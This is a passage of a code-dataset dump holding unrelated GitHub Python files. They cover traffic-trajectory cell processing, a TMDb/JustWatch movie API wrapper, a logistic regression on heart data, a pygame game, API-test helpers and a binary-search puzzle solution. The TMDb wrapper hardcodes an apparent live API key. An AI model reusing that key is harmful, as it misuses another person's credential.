y1, y2 = y2, y1\r\n swapped = True\r\n \r\n # Recalculate differentials\r\n dx = x2 - x1\r\n dy = y2 - y1\r\n \r\n # Calculate error\r\n error = int(dx / 2.0)\r\n ystep = 1 if y1 < y2 else -1\r\n \r\n # Iterate over bounding box generating points between start and end\r\n y = y1\r\n points = []\r\n for x in range(x1, x2 + 1):\r\n coord = (y, x) if is_steep else (x, y)\r\n points.append(coord)\r\n error -= abs(dy)\r\n if error < 0:\r\n y += ystep\r\n error += dx\r\n \r\n # Reverse the list if the coordinates were swapped\r\n if swapped:\r\n points.reverse()\r\n points=pd.DataFrame(points)\r\n points.columns=['X','Y']\r\n return points\r\n\r\ndef cell_arrive_leave(index):\r\n MAR=4\r\n print(\"-----------------------------\")\r\n print(index)\r\n try:\r\n car_pixel=pixel_data.loc[(pixel_data['carID']==index)]\r\n test_car=car_data.loc[(car_data['carID']==index)] #get the vehicle l w from vehicle data\r\n carL=test_car['carL'].iloc[2]\r\n carW=test_car['carW'].iloc[3]\r\n\r\n #plot the original data\r\n \r\n #cell_arrive_leave_temp=cell_arrive_leave(car_pixel,carW,carL,MAR=4)\r\n #\r\n except:\r\n return pd.DataFrame()\r\n if car_pixel.shape[0]<=60:\r\n return pd.DataFrame()\r\n print(\"================================\")\r\n test=car_pixel\r\n test['carCenterX1']=test['carCenterX'].rolling(window=60).mean()\r\n test['carCenterY1']=test['carCenterY'].rolling(window=60).mean()\r\n test['course']=test['course'].rolling(window=10).mean()\r\n #plt.plot(test['course'])\r\n test=test[pd.notnull(test['carCenterX1'])]\r\n L=MAR\r\n test['frameNUM_L']=test['frameNUM']%L\r\n test=test.loc[(test['frameNUM_L']==0)]\r\n test['angle']=(test['course']/180)*(np.pi) #change ganle to radius\r\n test['cos']=np.cos(test['angle'])\r\n test['sin']=np.sin(test['angle'])\r\n ##set up twelve points at the original point\r\n test['L_X11']=-carW/2 \r\n test['L_Y11']=carL/2\r\n test['L_X21']=-carW/2 \r\n test['L_Y21']=carL/4\r\n test['L_X31']=-carW/2 \r\n test['L_Y31']=carL/4+1\r\n test['L_X41']=-carW/2\r\n test['L_Y41']=-carL/4\r\n test['L_X51']=-carW/2\r\n test['L_Y51']=-carL/4+1\r\n test['L_X61']=-carW/2\r\n test['L_Y61']=-carL/2\r\n test['R_X11']=carW/2\r\n test['R_Y11']=carL/2\r\n test['R_X21']=carW/2\r\n test['R_Y21']=carL/4\r\n test['R_X31']=carW/2\r\n test['R_Y31']=carL/4+1\r\n test['R_X41']=carW/2\r\n test['R_Y41']=-carL/4\r\n test['R_X51']=carW/2\r\n test['R_Y51']=-carL/4+1\r\n test['R_X61']=carW/2\r\n test['R_Y61']=-carL/2\r\n test['L_X1']=test['L_X11']*test['cos']+test['L_Y11']*test['sin']+test['carCenterX']\r\n test['L_Y1']=test['L_Y11']*test['cos']-test['L_X11']*test['sin']+test['carCenterY']\r\n test['L_X2']=test['L_X21']*test['cos']+test['L_Y21']*test['sin']+test['carCenterX']\r\n test['L_Y2']=test['L_Y21']*test['cos']-test['L_X21']*test['sin']+test['carCenterY']\r\n test['L_X3']=test['L_X31']*test['cos']+test['L_Y31']*test['sin']+test['carCenterX']\r\n test['L_Y3']=test['L_Y31']*test['cos']-test['L_X31']*test['sin']+test['carCenterY']\r\n test['L_X4']=test['L_X41']*test['cos']+test['L_Y41']*test['sin']+test['carCenterX']\r\n test['L_Y4']=test['L_Y41']*test['cos']-test['L_X41']*test['sin']+test['carCenterY']\r\n test['L_X5']=test['L_X51']*test['cos']+test['L_Y51']*test['sin']+test['carCenterX']\r\n test['L_Y5']=test['L_Y51']*test['cos']-test['L_X51']*test['sin']+test['carCenterY']\r\n test['L_X6']=test['L_X61']*test['cos']+test['L_Y61']*test['sin']+test['carCenterX']\r\n test['L_Y6']=test['L_Y61']*test['cos']-test['L_X61']*test['sin']+test['carCenterY']\r\n test['R_X1']=test['R_X11']*test['cos']+test['R_Y11']*test['sin']+test['carCenterX']\r\n test['R_Y1']=test['R_Y11']*test['cos']-test['R_X11']*test['sin']+test['carCenterY']\r\n test['R_X2']=test['R_X21']*test['cos']+test['R_Y21']*test['sin']+test['carCenterX']\r\n test['R_Y2']=test['R_Y21']*test['cos']-test['R_X21']*test['sin']+test['carCenterY']\r\n test['R_X3']=test['R_X31']*test['cos']+test['R_Y31']*test['sin']+test['carCenterX']\r\n test['R_Y3']=test['R_Y31']*test['cos']-test['R_X31']*test['sin']+test['carCenterY']\r\n test['R_X4']=test['R_X41']*test['cos']+test['R_Y41']*test['sin']+test['carCenterX']\r\n test['R_Y4']=test['R_Y41']*test['cos']-test['R_X41']*test['sin']+test['carCenterY']\r\n test['R_X5']=test['R_X51']*test['cos']+test['R_Y51']*test['sin']+test['carCenterX']\r\n test['R_Y5']=test['R_Y51']*test['cos']-test['R_X51']*test['sin']+test['carCenterY']\r\n test['R_X6']=test['R_X61']*test['cos']+test['R_Y61']*test['sin']+test['carCenterX']\r\n test['R_Y6']=test['R_Y61']*test['cos']-test['R_X61']*test['sin']+test['carCenterY']\r\n #get all twelve points data\r\n test1=test.iloc[:,45:69]\r\n test1[['carCenterX','carCenterY','frameNUM','course','carID']]=test[['carCenterX','carCenterY','frameNUM','course','carID']]\r\n test1.iloc[:,0:24]=np.around(test1.iloc[:,0:24]).astype(np.int64)\r\n #select all cells\r\n Len_test1=test1.shape[0]\r\n points=pd.DataFrame()\r\n print(\"]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]\")\r\n for i in range(0,Len_test1):\r\n print(\"car \"+str(index)+\" - \"+ str(i)+\"/\"+str(Len_test1))\r\n for j in range(0,5):\r\n x_start=test1.iloc[i,(j*2)]\r\n y_start=test1.iloc[i,(j*2+1)]\r\n x_end=test1.iloc[i,((j+1)*2)]\r\n y_end=test1.iloc[i,((j+1)*2+1)]\r\n points_temp=Bresenham(x_start,y_start,x_end,y_end)\r\n points_temp['part_id']=(j+1)*100+(j+2)\r\n points_temp['part_id']=(j+1)*100+(j+2)\r\n points_temp['carCenterX']=test1.iloc[i,24]\r\n points_temp['carCenterY']=test1.iloc[i,25]\r\n points_temp['frameNUM']=test1.iloc[i,26]\r\n points_temp['course']=test1.iloc[i,27]\r\n points_temp['carID']=test1.iloc[i,28]\r\n points=points.append(points_temp)\r\n for j in range(6,11):\r\n x_start=test1.iloc[i,(j*2)]\r\n y_start=test1.iloc[i,(j*2+1)]\r\n x_end=test1.iloc[i,((j+1)*2)]\r\n y_end=test1.iloc[i,((j+1)*2+1)]\r\n points_temp=Bresenham(x_start,y_start,x_end,y_end)\r\n points_temp['part_id']=(j+1)*100+(j+2)\r\n points_temp['carCenterX']=test1.iloc[i,24]\r\n points_temp['carCenterY']=test1.iloc[i,25]\r\n points_temp['frameNUM']=test1.iloc[i,26]\r\n points_temp['course']=test1.iloc[i,27]\r\n points_temp['carID']=test1.iloc[i,28]\r\n points=points.append(points_temp)\r\n for j in range(0,6):\r\n x_start=test1.iloc[i,j*2]\r\n y_start=test1.iloc[i,j*2+1]\r\n x_end=test1.iloc[i,(j+6)*2]\r\n y_end=test1.iloc[i,(j+6)*2+1]\r\n points_temp=Bresenham(x_start,y_start,x_end,y_end)\r\n points_temp['part_id']=(j+1)*100+(j+7)\r\n points_temp['carCenterX']=test1.iloc[i,24]\r\n points_temp['carCenterY']=test1.iloc[i,25]\r\n points_temp['frameNUM']=test1.iloc[i,26]\r\n points_temp['course']=test1.iloc[i,27]\r\n points_temp['carID']=test1.iloc[i,28]\r\n points=points.append(points_temp)\r\n points['part']=0\r\n points['part'][(points['part_id'] ==102)] = 1 #1 head 2 middle 3 rear\r\n points['part'][(points['part_id'] ==107)] = 1\r\n points['part'][(points['part_id'] ==208)] = 1 \r\n points['part'][(points['part_id'] ==708)] = 1 \r\n points['part'][(points['part_id'] ==304)] = 2 #1 head 2 middle 3 rear\r\n points['part'][(points['part_id'] ==309)] = 2\r\n points['part'][(points['part_id'] ==410)] = 2 \r\n points['part'][(points['part_id'] ==910)] = 2 \r\n points['part'][(points['part_id'] ==506)] = 3 #1 head 2 middle 3 rear\r\n points['part'][(points['part_id'] ==511)] = 3\r\n points['part'][(points['part_id'] ==1112)] =3 \r\n points['part'][(points['part_id'] ==612)] = 3 \r\n points = points[points['part'] != 0]\r\n #get all arrival and leave carid, framenum, and part\r\n #arrive_points=points.groupby(['X','Y','carID','part'], as_index=False)['frameNUM'].min()\r\n arrive_points=points[points['frameNUM'].isin(points.groupby(['X','Y','carID','part']).min()['frameNUM'].values)]\r\n arrive_points['status']=1 #1 is arrive and 2 is leave\r\n leave_points=points[points['frameNUM'].isin(points.groupby(['X','Y','carID','part']).max()['frameNUM'].values)]\r\n leave_points['status']=2\r\n cell_arrive_leave=arrive_points.append(leave_points)\r\n #output the cell data\r\n #cell_arrive_leave_final.append(cell_arrive_leave)\r\n #print(cell_arrive_leave)\r\n with open('cell_leave_arrive_07.csv', 'a') as f:\r\n cell_arrive_leave.to_csv(f, header=False)\r\n # cell_arrive_leave.to_csv(str(index)+\".csv\")\r\n return cell_arrive_leave\r\n\r\ncell_arrive_leave_final=pd.DataFrame()\r\ncarnum=car_data['carID'].max()+1\r\npool = Pool(os.cpu_count()-1)\r\n#pool = Pool(2)\r\nresults = [pool.apply_async(cell_arrive_leave, args=(x,)) for x in range(1,carnum)]\r\ncell_arrive_leave_final = [p.get() for p in results]\r\nprint(\"finished reading cars =====================\") \r\nprint(os.cpu_count())\r\n\r\n\r\n","repo_name":"inawu/Obtain-PET-conflicts-from-trajectory","sub_path":"arrive_leave_0808.py","file_name":"arrive_leave_0808.py","file_ext":"py","file_size_in_byte":10956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27312706466","text":"from typing import List\nimport justwatch\n\nimport tmdbsimple as tmdb\n\n\njustwatch.justwatchapi.HEADER = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\ntmdb.API_KEY = '6d343765c641930b74aae2d4a89c22f8'\n\n\nclass TmdbApiManager:\n \"\"\"\n The Movie Database API (https://developers.themoviedb.org/)\n \"\"\"\n\n @staticmethod\n def search_tv_shows(**kwargs) -> List:\n \"\"\"\n Searches tv shows by specified search string and returns matches.\n Specify query in URL,\n assigns ' ' by default which returns no results\n --> `/search/hello` will return all results having \"hello\"\n Allows specifying max results to return,\n returns all matching results by default\n --> `/search/hello/20` will return first 20 results\n \"\"\"\n\n search = tmdb.Search()\n results = []\n\n tv_response = search.tv(query=query)\n for page in range(1, tv_response['total_pages']+1):\n results.extend(search.tv(query=query, page=page)['results'])\n if max_results and len(results) > max_results:\n results = results[:max_results]\n break\n\n return results\n\n @staticmethod\n def search_movies(**kwargs) -> List:\n \"\"\"\n Searches movies by specified search string and returns matches.\n Specify query in URL,\n assigns ' ' by default which returns no results\n --> `/search/hello` will return all results having \"hello\"\n Allows specifying max results to return,\n returns all matching results by default\n --> `/search/hello/20` will return first 20 results\n Optional Args:\n language: (optional) (optional) ISO 639-1 code.\n query: (required) Pass a text query to search. This value should be\n URI encoded.\n page: (optional) Minimum 1, maximum 1000, default 1.\n include_adult: (optional) Choose whether to inlcude adult\n content in the results.\n region: (optional) Specify a ISO 3166-1 code to filter release\n dates. Must be uppercase.\n year: (optional) A filter to limit the results to a specific year\n (looking at all release dates).\n primary_release_year: (optional) A filter to limit the results to a\n specific primary release year.\n \"\"\"\n search = tmdb.Search()\n results = []\n max_results = int(kwargs['max_results'])\n\n movie_response = search.movie(query=kwargs['query'],\n language=kwargs['language'],\n include_adult=kwargs['include_adult'],\n region=kwargs['region'],\n year=kwargs['year'],\n primary_release_year=kwargs['primary_release_year'])\n\n for page in range(1, movie_response['total_pages']+1):\n results.extend(\n search.movie(query=kwargs['query'],\n language=kwargs['language'],\n include_adult=kwargs['include_adult'],\n region=kwargs['region'],\n year=kwargs['year'],\n primary_release_year=kwargs['primary_release_year'],\n page=kwargs['page'])['results']\n )\n if max_results and len(results) > max_results:\n results = results[:max_results]\n break\n\n return results\n\n @staticmethod\n def get_popular_movies(**kwargs) -> List:\n \"\"\"\n Returns popular movies.\n Allows specifying max results to return,\n returns 1000 by default as the TMDb API does\n --> `/popular/20` will return top 20\n Optional Args:\n language: (optional) ISO 639-1 code.\n page: (optional) Minimum 1, maximum 1000, default 1.\n region: (optional) Specify a ISO 3166-1 code to filter release\n dates. Must be uppercase.\n \"\"\"\n\n movies = tmdb.Movies()\n results = []\n max_results = int(kwargs['max_results'])\n\n response = movies.popular(language=kwargs['language'],\n region=kwargs['region'])\n for page in range(1, response['total_pages']+1):\n results.extend(\n movies.popular(language=kwargs['language'],\n region=kwargs['region'],\n page=page)['results']\n )\n if max_results and len(results) > max_results:\n results = results[:max_results]\n break\n\n return results\n\n @staticmethod\n def get_latest_movie(**kwargs) -> List:\n \"\"\"\n Args:\n language: (optional) ISO 639-1 code.\n Returns latest movies.\n \"\"\"\n movies = tmdb.Movies()\n result = movies.latest(language=kwargs['language'])\n return result\n\n @staticmethod\n def get_top_rated(**kwargs) -> List:\n \"\"\"\n Optional Args:\n language: (optional) ISO 639-1 code.\n page: (optional) Minimum 1, maximum 1000, default 1.\n region: (optional) Specify a ISO 3166-1 code to filter release\n dates. Must be uppercase.\n Returns top-rated movies.\n Allows specifying max results to return,\n returns all matching results by default\n --> `/top-rated/20` will return first 20\n \"\"\"\n movies = tmdb.Movies()\n results = []\n max_results = int(kwargs['max_results'])\n\n response = movies.top_rated(language=kwargs['language'],\n region=kwargs['region'])\n for page in range(1, response['total_pages']+1):\n results.extend(movies.top_rated(language=kwargs['language'],\n region=kwargs['region'], page=page)['results'])\n if max_results and len(results) > max_results:\n results = results[:max_results]\n break\n\n return results\n\n @staticmethod\n def get_upcoming(**kwargs) -> List:\n \"\"\"\n Args:\n language: (optional) ISO 639-1 code.\n page: (optional) Minimum 1, maximum 1000, default 1.\n region: (optional) Specify a ISO 3166-1 code to filter release\n dates. Must be uppercase.\n Returns upcoming movies.\n Allows specifying max results to return,\n returns all matching results by default\n --> `/upcoming/20` will return first 20\n \"\"\"\n\n movies = tmdb.Movies()\n results = []\n max_results = int(kwargs['max_results'])\n\n response = movies.upcoming(language=kwargs['language'],\n region=kwargs['region'])\n for page in range(1, response['total_pages']+1):\n results.extend(movies.upcoming(language=kwargs['language'],\n region=kwargs['region'], page=page)['results'])\n if max_results and len(results) > max_results:\n results = results[:max_results]\n break\n\n return results\n\n\nclass JustWatchApiManager:\n @staticmethod\n def search_response_with_tmdb_id(country=\"IN\", **kwargs):\n \"\"\"\n Returns the response with the exact tmdb_id\n Parameters of function: Query(movie or show name),\n Country(the region fo which it fetches the sources from),\n Tmdb_id(the one that is needed)\n \"\"\"\n just_watch = justwatch.JustWatch(country)\n results = just_watch.search_for_item(\n query=kwargs['query'])\n for i in range(results['total_results']):\n try:\n temp2 = len(results['items'][i]['scoring'])\n temp = results['items'][i]['scoring']\n for j in range(temp2):\n if temp[j]['provider_type'] == \"tmdb:id\":\n if temp[j]['value'] == int(kwargs['tmdb_id']):\n return results['items'][i]\n except:\n pass\n return {'failed': 'not found'}\n\n\nclass IncomingApiManager(TmdbApiManager, JustWatchApiManager):\n @staticmethod\n def get_movie_details(tmdb_id: int):\n \"\"\"\n Args:\n \"tmdb_id\": -- tmdb_id of the movie\n Returns more details about the movie\n \"\"\"\n movie = tmdb.Movies(tmdb_id).info()\n meta_data = IncomingApiManager.search_response_with_tmdb_id(\n query=movie['title'], tmdb_id=movie['id'])\n movie['meta_data'] = meta_data\n return movie\n","repo_name":"CruxBox/Recco","sub_path":"backend/backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23451173720","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[141]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n#ReadData\ndataset = pd.read_csv(\"heart.CSV\")\n\n#Seperate data\nfeatures_cols = ['trestbps','chol','thalach','oldpeak']\nx1 = dataset[features_cols]\ny =dataset.target.values\n\n#data normalization\nx = (x1 - np.min(x1))/(np.max(x1)-np.min(x1)).values\n\n#Split the dataset into training and testing sets\nfrom sklearn.model_selection import train_test_split\nxtrain, xtest, ytrain, ytest = train_test_split(x,y,test_size=0.2, random_state=42)\n\n#transposition\nxtrain = xtrain.T\nxtest = xtest.T\nytrain = ytrain.T\nytest = ytest.T\n\n# print(xtrain.shape) \n# print(xtrain.shape[0])\n# print(xtrain.shape[1])\n\n#logistic regression with sklearn\nfrom sklearn.linear_model import LogisticRegression\nLReg = LogisticRegression()\nLReg.fit(xtrain.T,ytrain.T)\ny_pred_lReg = LReg.predict(xtest.T)\n\n#Model Accuracy & error rate\nprint(\"Test Accuracy of Logistic regression by Sklearn:{} %\".format(100-np.mean(np.abs(y_pred_lReg-ytest.T))*100))\nprint(\"Test error of Logistic regression by Sklearn:{} %\".format(100-np.mean(np.abs(1 - y_pred_lReg-ytest.T) )*100))\n\n#Initializing Sigmoid (optimized hypothesis)Function\ndef sigmoid(z):\n h = 1/(1+ np.exp(-z))\n return h\n\n#cost function\ndef calc_error(xtrain,ytrain,g):\n m = xtrain.shape[1]\n cost = np.sum(ytrain*np.log(g)+(1-ytrain)*np.log(1-g))/-m\n return cost\n\n# gradient descent & updating thetas\ndef gradient_descent(xtrain,ytrain,alpha,itrations):\n error = []\n index = [] # used to save the itrations for Ploting the cost against the number of iterations\n n , m = xtrain.shape #(4,242)\n theta = np.zeros(n) #[theta1,theta2,theta3,theta4]\n theta0 = 0\n for i in range(itrations):\n \n z = np.dot(theta.T, xtrain) + theta0\n g = sigmoid(z)\n \n derivative_theta = 1/m * (np.dot(xtrain, ((g - ytrain).T)))\n derivative_theta0 = 1/m * np.sum(g-ytrain)\n \n #new thetas after update\n theta = theta - alpha * derivative_theta\n theta0 = theta0 - alpha * derivative_theta0\n \n cost = calc_error(xtrain,ytrain,g)\n error.append(cost)\n \n print(\"Cost after iteration %i: %f\" % (i, cost))\n \n index.append(i) \n \n \n #implementing array holding value of theta0,and values of the array[theta1,theta2,theta3,theta4] \n parameters = {\"Theta\": theta, \"Theta0\":theta0}\n\n return parameters,index,error\n\n# make predictions\ndef predict_new_data(xtest,theta):\n z = np.dot(xtest.T,theta) \n g =sigmoid(z)\n y_predict = []\n for i in g:\n if i >0.5:\n y_predict.append(1)\n else:\n y_predict.append(0) \n return y_predict\n \n# Logistic Regression\ndef LogReg(xtrain, xtest, ytrain, ytest,alpha,itrations):\n\n features_size = xtrain.shape[0] #4 features\n \n parameters,index,error = gradient_descent(xtrain,ytrain,alpha,itrations)\n\n y_pred_test = predict_new_data(xtest,parameters[\"Theta\"]) \n # Ploting the cost against the number of iterations\n plt.plot(index,error)\n plt.xlabel(\"Number of iteration\")\n plt.ylabel(\"Cost\")\n plt.show()\n \n print(\"Test Accuracy of logistic regression model :{} %\".format(100-np.mean(np.abs(y_pred_test-ytest))*100))\n\n\n# In[142]:\n\n\nLogReg(xtrain,xtest,ytrain,ytest,alpha =0.001,itrations=500)\n\n\n# In[143]:\n\n\nLogReg(xtrain,xtest,ytrain,ytest,alpha = 0.01,itrations=1000)\n\n\n# In[144]:\n\n\nLogReg(xtrain,xtest,ytrain,ytest,alpha = 0.03,itrations=1000)\n\n\n# In[145]:\n\n\nLogReg(xtrain,xtest,ytrain,ytest,alpha = 0.1,itrations=1000)\n\n\n# In[146]:\n\n\nLogReg(xtrain,xtest,ytrain,ytest,alpha =1,itrations=1000) \n\n\n# In[ ]:\n\n\n\n\n","repo_name":"HebaFahmy99/Logistic-Regression","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"73989833764","text":"__author__ = 'Harley'\nimport sys, pygame\nfrom constants import *\n\nfrom gui import GUI\nRESOLUTION = pygame.Rect(0, 0,SCREEN_WIDTH , SCREEN_HEIGHT)\npygame.init()\n\n# Main_bgui is an instance of the gui class. Initializes screen size\nmain_gui = GUI(RESOLUTION,\"media/art/back_new.jpg\")\nmain_gui.load_background()\n\nclock = pygame.time.Clock()\n\n# Set starting units:\nmain_gui.activate_fortress(0)\nmain_gui.activate_fortress(1)\n# The game loop\nwhile 1:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.display.quit()\n sys.exit()\n # End if q is pressed\n if (event.type == pygame.KEYDOWN and\n (event.key == pygame.K_q or event.key == pygame.K_ESCAPE)):\n pygame.display.quit()\n sys.exit()\n # a key spawns a melee unit on the left side\n if (event.type == pygame.KEYDOWN and\n event.key == pygame.K_a and main_gui.team_0_cash>=MELEE_PRICE):\n main_gui.activate_melee(0)\n # j key spawns a melee unit on the right side\n if (event.type == pygame.KEYDOWN and\n event.key == pygame.K_j and main_gui.team_1_cash>=MELEE_PRICE):\n main_gui.activate_melee(1)\n # s key spawns a archer unit on the left side\n if (event.type == pygame.KEYDOWN and\n event.key == pygame.K_s and main_gui.team_0_cash>=ARCHER_PRICE):\n main_gui.activate_archer(0)\n # k key spawns a archer unit on the right side\n if (event.type == pygame.KEYDOWN and\n event.key == pygame.K_k and main_gui.team_1_cash>=ARCHER_PRICE):\n main_gui.activate_archer(1)\n # d key spawns a heavy unit on the left side\n if (event.type == pygame.KEYDOWN and\n event.key == pygame.K_d and main_gui.team_0_cash>=HEAVY_PRICE):\n main_gui.activate_heavy(0)\n # l key spawns a heavy unit on the right side\n if (event.type == pygame.KEYDOWN and\n event.key == pygame.K_l and main_gui.team_1_cash>=HEAVY_PRICE):\n main_gui.activate_heavy(1)\n # f key activates unit balancer, charges team 0 the cost\n if (event.type == pygame.KEYDOWN and\n event.key == pygame.K_f and main_gui.team_0_cash>=SWAP_PRICE):\n main_gui.special(0)\n # h key activates unit balancer, charges team 1 the cost\n if (event.type == pygame.KEYDOWN and\n event.key == pygame.K_h and main_gui.team_1_cash>=SWAP_PRICE):\n main_gui.special(1)\n pygame.display.flip()\n main_gui.update_units()\n main_gui.draw_units()\n main_gui.update_HUD()\n clock.tick(60)\n\n\n","repo_name":"HarleyVanselow/CMPUT-275-FinalProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40508302320","text":"#!/usr/bin/env python\n\nimport os\nimport re\n\nfrom setuptools import setup, find_packages\n\n\nROOT = os.path.dirname(__file__)\nVERSION_RE = re.compile(r'''__version__ = ['\"]([0-9.]+)['\"]''')\n\n\ndef get_version():\n init = open(os.path.join(ROOT, 'skyscraper', '__init__.py')).read()\n return VERSION_RE.search(init).group(1)\n\n\nsetup(\n name='skyscraper',\n version=get_version(),\n description='Automatic HTML parser and car value evaluator',\n long_description='',\n author='Zsolt Deak',\n url='https://github.com/amdor/skyscraper',\n scripts=[],\n packages=find_packages(exclude=['tests*']),\n package_data={},\n include_package_data=False,\n install_requires=[],\n license=\"The MIT License (MIT)\",\n classifiers=[\n 'Development Status :: 2 - Work in progress',\n 'Intended Audience :: Developers',\n 'Natural Language :: English',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.6.2',\n ]\n)","repo_name":"amdor/skyscraper","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"75178420004","text":" \n\n#===================================#\nfrom physcons import KB\nimport numpy as np\n#===================================#\n\n\n#===================================#\ndef calc_cag(ltemp,VadiSpl,lscvt=None):\n # calculate dE\n sAG, VAG = VadiSpl.get_max()\n if lscvt is None: Ediff = [VAG-VadiSpl(0.0) for T in ltemp]\n else : Ediff = [VAG-VadiSpl(s_i) for s_i in lscvt]\n # get cag\n cag = [np.exp(-dE/KB/T) for T,dE in zip(ltemp,Ediff)]\n return Ediff , cag\n#===================================#\n\n\n","repo_name":"daferro/Pilgrim","sub_path":"src/common/cag.py","file_name":"cag.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"15844943166","text":"#coding=utf-8\n\n\n#接口测试通用函数\n\nimport requests\nimport HTMLTestRunner\n\n#接口请求函数\n#参数: url 接口地址\n# form 接口参数,默认为空\n# method 接口请求方法, 值为\"GET\"或\"POST\", 默认\"GET\"\n#返回值: json字符串\ndef url_request(url, form=\"\", method=\"GET\"):\n\n response = \"\"\n\n if method == \"POST\":\n response = requests.post(url, data=form)\n\n\n else:\n response = requests.get(url)\n\n print(response)\n\n return response.json()\n\n#打印测试报告函数\n#参数: suit 测试套件函数\n# filePath 测试报告文件路径!!需要先把文件夹建好!!\n# title 测试报告标题\n# descri 测试报告描述\ndef testReport(suit, filePath, title, descri):\n fp = open(filePath, \"wb+\")\n runner = HTMLTestRunner.HTMLTestRunner(stream=fp, title=title, description=descri)\n runner.run(suit)\n fp.close()\n\n\n\n\n","repo_name":"giwatest/pintuanAPITest","sub_path":"CITest/testUtils/apiUtils.py","file_name":"apiUtils.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20662475106","text":"# 문제\n# 개똥벌레 한 마리가 장애물(석순과 종유석)로 가득찬 동굴에 들어갔다. 동굴의 길이는 N미터이고, 높이는 H미터이다. (N은 짝수) 첫 번째 장애물은 항상 석순이고,\n# 그 다음에는 종유석과 석순이 번갈아가면서 등장한다.\n# 아래 그림은 길이가 14미터이고 높이가 5미터인 동굴이다. (예제 그림)\n# 이 개똥벌레는 장애물을 피하지 않는다. 자신이 지나갈 구간을 정한 다음 일직선으로 지나가면서 만나는 모든 장애물을 파괴한다.\n# 위의 그림에서 4번째 구간으로 개똥벌레가 날아간다면 파괴해야하는 장애물의 수는 총 여덟개이다. (4번째 구간은 길이가 3인 석순과 길이가 4인 석순의 중간지점을 말한다)\n# 하지만, 첫 번째 구간이나 다섯 번째 구간으로 날아간다면 개똥벌레는 장애물 일곱개만 파괴하면 된다.\n# 동굴의 크기와 높이, 모든 장애물의 크기가 주어진다. 이때, 개똥벌레가 파괴해야하는 장애물의 최솟값과 그러한 구간이 총 몇 개 있는지 구하는 프로그램을 작성하시오.\n\n# 입력\n# 첫째 줄에 N과 H가 주어진다. N은 항상 짝수이다. (2 ≤ N ≤ 200,000, 2 ≤ H ≤ 500,000)\n# 다음 N개 줄에는 장애물의 크기가 순서대로 주어진다. 장��물의 크기는 H보다 작은 양수이다.\n\n# 출력\n# 첫째 줄에 개똥벌레가 파괴해야 하는 장애물의 최솟값과 그러한 구간의 수를 공백으로 구분하여 출력한다.\n\n# h를 이분 탐색 기준으로 삼으려고 했음 -> 이러면 만족하는 h의 개수를 찾을 수 없음\n# N, H = map(int, input().split())\n# rocks = []\n#\n# for i in range(N):\n# rocks.append(int(input()))\n#\n# start = 1\n# end = H\n# result = N + 1\n# result_set = set()\n#\n# # while start <= end:\n# for where in range(1, H+1):\n# low_bomb = 0\n# high_bomb = 0\n# # mid = (start + end) // 2\n# for i in range(0, N, 2):\n# if rocks[i] >= where:\n# low_bomb += 1\n# for i in range(1, N, 2):\n# if rocks[i] > H - where:\n# high_bomb += 1\n#\n# if low_bomb + high_bomb < result:\n# result = low_bomb + high_bomb\n# result_set.clear()\n# result_set.add(where)\n# elif low_bomb + high_bomb == result:\n# result_set.add(where)\n#\n# # if low_bomb > high_bomb:\n# # start = where + 1\n# # else:\n# # end = where - 1\n#\n# print(result, len(result_set))\n\n# h에 대해서는 for loop을 통해 linear하게 탐색하고, 각 h에 대해 부딪히는 개수를 logN으로 찾자\n# https://blog.naver.com/PostView.nhn?blogId=crm06217&logNo=222023706440&categoryNo=23&parentCategoryNo=0&viewDate=¤tPage=1&postListTopCurrentPage=1&from=postView\n\nimport sys\n\n\ndef Binary_Search_Upper(data_list, x): #주어진 list에서 x보다 큰 데이터의 개수를 반환; log n 안에 찾음\n left = 0\n right = len(data_list) - 1\n while left <= right:\n mid = (left + right) // 2\n if data_list[mid] <= x:\n left = mid + 1\n else:\n right = mid - 1\n return len(data_list) - (right + 1) #index, 개수 차이 때문에 1 더해줌\n\ninput_list = input().split()\nN = int(input_list[0])\nH = int(input_list[1])\ndata_down = []\ndata_up = []\nfor i in range(N):\n input_list_2 = sys.stdin.readline().split()\n input_num = int(input_list_2[0])\n if i % 2 == 0: #아래부터 높이 재기\n data_down.append(input_num)\n else: #위부터 높이 재기\n data_up.append(input_num)\ndata_down.sort()\ndata_up.sort()\nans = N #장애물의 최솟값\ncnt = 0 #구간 몇 개 있는지\nfor h in range(1, H + 1):\n down_num = Binary_Search_Upper(data_down, h - 1)\n up_num = Binary_Search_Upper(data_up, H - h)\n cur_num = down_num + up_num #현재 mid 값을 기준으로 잘랐을 때의 장애물의 수\n if cur_num < ans: #새로운 최솟값이 나오면 정답 업데이트; 개수는 1부터 다시 셈\n ans = cur_num\n cnt = 1\n elif cur_num == ans: #현재 최솟값과 같은 값이 한 번 더 나오면 개수 1 증가\n cnt += 1\nprint(ans, cnt)","repo_name":"ParkHyeongKyu/baekjoon","sub_path":"binarysearch/3020-G5.py","file_name":"3020-G5.py","file_ext":"py","file_size_in_byte":4347,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21184883692","text":"import numpy as np\nimport pandas 